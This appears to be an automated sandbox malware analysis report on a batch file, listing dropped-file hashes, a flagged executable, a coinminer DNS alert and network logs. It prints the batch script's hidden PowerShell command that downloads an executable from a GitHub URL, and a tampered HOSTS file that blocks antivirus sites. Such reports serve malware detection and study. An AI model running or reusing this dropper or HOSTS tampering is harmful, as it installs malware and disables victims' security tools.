                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):64
                                                                                                    Entropy (8bit):0.34726597513537405
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Nlll:Nll
                                                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                    Malicious:false
                                                                                                    Preview:@...e...........................................................
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1348.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):935
                                                                                                    Entropy (8bit):4.748708890934076
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:QWDZh+ragzMZfuMMs1L/JU5fFCkK8T1rTtR:vDZhyoZWM9rU5fFcG
                                                                                                    MD5:BAF573F5B1C377B9D10ECC51CE0C0BFB
                                                                                                    SHA1:63199BFF9169ACA2303535EBA4AA6410D28C6AB3
                                                                                                    SHA-256:8EDB59CE85F326F243B3957C6F85F0764453A47075BC863A88BFAD63B6F9526E
                                                                                                    SHA-512:EA544CC1FE15A46C5DABE9CD845D2F2AE50AB6EB14EE6B676F5249D3D5F6E7D946934204693723749DE2D0A2B8AB8F4EB71AD63B51F8A81AA9E32683C664AB8B
                                                                                                    Malicious:true
                                                                                                    Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....0.0.0.0 https://www.drweb.ru/..0.0.0.0 https://www.kaspersky.ru/downloads/free-virus-removal-tool
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\ProgramData\Chrome.exe
                                                                                                    File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):14544
                                                                                                    Entropy (8bit):6.2660301556221185
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                                    MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                                    SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                                    SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                                    SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                                                                    Joe Sandbox View:
                                                                                                    • Filename: Google Chrome.exe, Detection: malicious, Browse
                                                                                                    • Filename: e7WMhx18XN.exe, Detection: malicious, Browse
                                                                                                    • Filename: GcqJPBLD2Q.exe, Detection: malicious, Browse
                                                                                                    • Filename: C5Lg2JSPlD.exe, Detection: malicious, Browse
                                                                                                    • Filename: TwrhjEKqxk.exe, Detection: malicious, Browse
                                                                                                    • Filename: aA45th2ixY.exe, Detection: malicious, Browse
                                                                                                    • Filename: 1mqzOM6eok.exe, Detection: malicious, Browse
                                                                                                    • Filename: updater.exe, Detection: malicious, Browse
                                                                                                    • Filename: 7QiAmg58Jk.exe, Detection: malicious, Browse
                                                                                                    • Filename: LnK0dS8jcA.exe, Detection: malicious, Browse
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                                                                    File type:DOS batch file, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                    Entropy (8bit):5.4850506084570725
                                                                                                    TrID:
                                                                                                      File name:eshkere.bat
                                                                                                      File size:440 bytes
                                                                                                      MD5:ae8361d48c8131bc78d0be59c8c95515
                                                                                                      SHA1:c3bc638c0556a66b4d98d56219e44adb2353235b
                                                                                                      SHA256:70ed9e7f429794334f660a314728f835421a8e203f55fd0a5ed3fde08967bebb
                                                                                                      SHA512:8e4502109581ac2dbbf1c21da44c9a0d0975979742af44f44d3aac9a200ed97aa6d9cc8ecc7c65c0786f480b6dd20b0cb77e43120d4c42494ea98cb67b4ca722
                                                                                                      SSDEEP:12:wDeOvi5BmV981k77WARm0NfQVWZV72T981kUM4TQdi:wSOZ7yABr7ODa
                                                                                                      TLSH:13F05C561A49BA2D8F325FA14575D1016A8F23402362D28F359D9838BE1144543CD4DD
                                                                                                      File Content Preview:@echo off..set url=https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe..set tempPath=%TEMP%..set filePath=%tempPath%\%RANDOM%.exe....powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('%url%', '%filePath%')
                                                                                                      Icon Hash:9686878b929a9886
                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                      2024-10-08T14:02:44.743380+02002036289ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)2192.168.2.9601741.1.1.153UDP
                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Oct 8, 2024 14:02:22.412178993 CEST49706443192.168.2.9140.82.121.4
                                                                                                      Oct 8, 2024 14:02:22.412245035 CEST44349706140.82.121.4192.168.2.9
                                                                                                      Oct 8, 2024 14:02:22.412327051 CEST49706443192.168.2.9140.82.121.4
                                                                                                      Oct 8, 2024 14:02:22.422061920 CEST49706443192.168.2.9140.82.121.4
                                                                                                      Oct 8, 2024 14:02:22.422077894 CEST44349706140.82.121.4192.168.2.9
                                                                                                      Oct 8, 2024 14:02:23.072796106 CEST44349706140.82.121.4192.168.2.9
                                                                                                      Oct 8, 2024 14:02:23.073002100 CEST49706443192.168.2.9140.82.121.4
                                                                                                      Oct 8, 2024 14:02:23.075737000 CEST49706443192.168.2.9140.82.121.4
                                                                                                      Oct 8, 2024 14:02:23.075747967 CEST44349706140.82.121.4192.168.2.9
                                                                                                      Oct 8, 2024 14:02:23.076097965 CEST44349706140.82.121.4192.168.2.9
                                                                                                      Oct 8, 2024 14:02:23.105671883 CEST49706443192.168.2.9140.82.121.4
                                                                                                      Oct 8, 2024 14:02:23.151396036 CEST44349706140.82.121.4192.168.2.9
                                                                                                      Oct 8, 2024 14:02:23.577830076 CEST44349706140.82.121.4192.168.2.9
                                                                                                      Oct 8, 2024 14:02:23.577980995 CEST44349706140.82.121.4192.168.2.9
                                                                                                      Oct 8, 2024 14:02:23.578041077 CEST49706443192.168.2.9140.82.121.4
                                                                                                      Oct 8, 2024 14:02:23.578063965 CEST44349706140.82.121.4192.168.2.9
                                                                                                      Oct 8, 2024 14:02:23.578135967 CEST49706443192.168.2.9140.82.121.4
                                                                                                      Oct 8, 2024 14:02:23.581636906 CEST49706443192.168.2.9140.82.121.4
                                                                                                      Oct 8, 2024 14:02:23.591293097 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:23.591351032 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:23.591547966 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:23.592060089 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:23.592082024 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.059184074 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.059350967 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.062513113 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.062524080 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.062932968 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.063925982 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.111411095 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.343606949 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.343717098 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.343754053 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.343776941 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.343802929 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.343848944 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.343852997 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.343864918 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.343916893 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.351305962 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.351660967 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.351701021 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.351737976 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.351746082 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.351759911 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.351821899 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.400206089 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.400244951 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.441512108 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.441536903 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.441580057 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.441632986 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.441660881 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.441673994 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.441735029 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.441735029 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.443955898 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.443979979 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.444039106 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.444047928 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.444112062 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.444125891 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.499121904 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.526838064 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.526859999 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.526905060 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.526925087 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.526954889 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.526979923 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.527031898 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.527048111 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.528420925 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.528444052 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.528489113 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.528492928 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.528523922 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.528533936 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.528559923 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.528580904 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.529989958 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.530035019 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.530071020 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.530080080 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.530121088 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.530131102 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.574768066 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.574862003 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.574907064 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.574920893 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.574954987 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.574975014 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.626669884 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.626703024 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.626768112 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.626784086 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.626813889 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.626832008 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.628441095 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.628460884 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.628525972 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.628535032 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.628593922 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.629571915 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.629595041 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.629642963 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.629654884 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.629679918 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.629698992 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.631546974 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.631577015 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.631645918 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.631654978 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.631686926 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.631706953 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.633330107 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.633349895 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.633426905 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.633436918 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.633485079 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.634316921 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.634336948 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.634407997 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.634417057 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.634459019 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.661789894 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.661815882 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.661881924 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.661894083 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.661923885 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.661947966 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.699888945 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.699913979 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.700004101 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.700012922 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.700056076 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.700076103 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.700083971 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.700103045 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.700118065 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.700159073 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.700649023 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.700675964 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.700721025 CEST49707443192.168.2.9185.199.109.133
                                                                                                      Oct 8, 2024 14:02:24.700728893 CEST44349707185.199.109.133192.168.2.9
                                                                                                      Oct 8, 2024 14:02:24.700742006 CEST49707443192.168.2.9185.199.109.133
